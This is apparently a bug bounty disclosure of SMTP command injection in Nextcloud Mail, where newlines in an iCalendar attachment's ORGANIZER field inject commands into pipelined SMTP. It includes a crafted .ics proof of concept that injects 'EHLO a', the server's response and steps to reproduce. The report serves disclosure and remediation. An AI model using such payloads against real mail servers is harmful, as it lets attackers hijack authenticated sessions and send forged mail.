SMTP Command Injection in iCalendar Attachments to Emails via Newlines

Note: This is similar to {1509216}, but has a new source/attack vector. Apologies for not picking this up earlier. ## Summary: When users receive iCalendar attachments in Mail, there is an option to add it to their calendar: ██████████ Once they add it to calendar, a PUT request is sent: ``` PUT /remote.php/dav/calendars/nextcloud/personal/██████.ics HTTP/2 Host: 192.168.92.132 BEGIN:VCALENDAR PRODID:-//Nextcloud Mail BEGIN:VTIMEZONE TZID:Asia/Singapore BEGIN:STANDARD TZOFFSETFROM:+0800 TZOFFSETTO:+0800 TZNAME:+08 DTSTART:19700101T000000 END:STANDARD END:VTIMEZONE BEGIN:VEVENT CREATED:20220319T044448Z DTSTAMP:20220319T080250Z LAST-MODIFIED:20220319T080250Z SEQUENCE:2 UID:a027641d-9f3a-4570-8cff-aa5cde0ba323 DTSTART;TZID=Asia/Singapore:20220322T100000 DTEND;TZID=Asia/Singapore:20220322T110000 STATUS:CONFIRMED SUMMARY:Normal Event ATTENDEE;CN=nextcloud;CUTYPE=INDIVIDUAL;PARTSTAT=DECLINED;ROLE=REQ-PARTICIP ANT;RSVP=TRUE;LANGUAGE=en:mailto:███ ORGANIZER;CN=Normal User:mailto:<ORGANIZER EMAIL> END:VEVENT END:VCALENDAR ``` At the same time, an SMTP pipelined command is sent to the email server to email <ORGANIZER EMAIL> that the user has accepted the event. Unfortunately, since `<ORGANIZER EMAIL>` is not sanitized, if an attacker sends a poisoned iCalendar file with newlines in the `ORGANIZER` property, this will inject newlines in the pipelined SMTP commands, allowing the attacker to inject arbitrary SMTP commands. These commands vary depending on the backend email server (Gmail, Outlook, local SMTP server) and thus can have different impacts, such as changing the `MAIL FROM` user, running sensitive commands like `QUEU` to view the current view, and so on. The errors in SMTP are returned in the response, thus making this a non-blind injection. For example, an attacker can inject a simple `EHLO a` command: ``` BEGIN:VCALENDAR CALSCALE:GREGORIAN VERSION:2.0 PRODID:-//Nextcloud Mail BEGIN:VEVENT CREATED:20220319T044448Z DTSTAMP:20220319T080250Z LAST-MODIFIED:20220319T080250Z SEQUENCE:2 UID:a027641d-9f3a-4570-8cff-aa5cde0ba323 DTSTART;TZID=Asia/Singapore:20220322T100000 DTEND;TZID=Asia/Singapore:20220322T110000 STATUS:CONFIRMED SUMMARY:Normal Event ATTENDEE;CN=nextcloud;CUTYPE=INDIVIDUAL;PARTSTAT=DECLINED;ROLE=REQ-PARTICIP ANT;RSVP=TRUE;LANGUAGE=en:mailto:████ ORGANIZER;CN=Normal User:mailto:test(\nEHLO a\n)@gmail.com END:VEVENT BEGIN:VTIMEZONE TZID:Asia/Singapore BEGIN:STANDARD TZOFFSETFROM:+0800 TZOFFSETTO:+0800 TZNAME:+08 DTSTART:19700101T000000 END:STANDARD END:VTIMEZONE END:VCALENDAR ``` Which for Gmail would return: ``` {"status":"error","message":"Could not send mail: Expected response code 354 but got code \"250\", with message \"250-smtp.gmail.com at your service, [116.89.6.224]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH\r\n250-ENHANCEDSTATUSCODES\r\n250-PIPELINING\r\n250-CHUNKING\r\n250 SMTPUTF8\r\n\"","data":{"type":"OCA\\Calendar\\Exception\\ServiceException","message":"Could not send mail: Expected response code 354 but got code \"250\", with message \"250-smtp.gmail.com at your service, [116.89.6.224]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH\r\n250-ENHANCEDSTATUSCODES\r\n250-PIPELINING\r\n250-CHUNKING\r\n250 SMTPUTF8\r\n\"","code":250, ``` Note that for this report, the commands are blind; but can be used remotely if changing the sender/recipient. I added additional logging to `/var/www/nextcloud/3rdparty/swiftmailer/swiftmailer/lib/classes/Swift/Transport/AbstractSmtpTransport.php` to confirm that the commands were injected. ## Steps To Reproduce: Note: Email sending should be set up in the admin settings. Setup `/var/www/nextcloud/3rdparty/swiftmailer/swiftmailer/lib/classes/Swift/Transport/AbstractSmtpTransport.php` to log SMTP commands. I inserted the following at line 343: `file_put_contents('/tmp/test.log',$response,FILE_APPEND);` (under `$response = $this->getFullResponse($seq);`). I also inserted the following at line 327: `file_put_contents('/tmp/test.log',$command,FILE_APPEND);` (below `$failures = (array) $failures;`). 1. At an external email, send the victim nextcloud email the attachment ███████. Modify `█████` in the file to the victim's email. 2. As the victim, check email in nextcloud. Click the 3 dots beside `event.ics` > Import into Calendar > Personal. This triggers the PUT request. 3. Check `/tmp/test.log`. Confirm that the newlines and arbitrary `EHLO a` SMTP commands have been injected and sent to the server. ## Impact The impact varies based on which commands are supported by the backend SMTP server. However, the main risk here is that the attacker can then hijack an already-authenticated SMTP session and run arbitrary SMTP commands as the email user, such as sending emails to other users, changing the FROM user, and so on. As before, this depends on the configuration of the server itself, but newlines should be sanitized to mitigate such arbitrary SMTP command injection.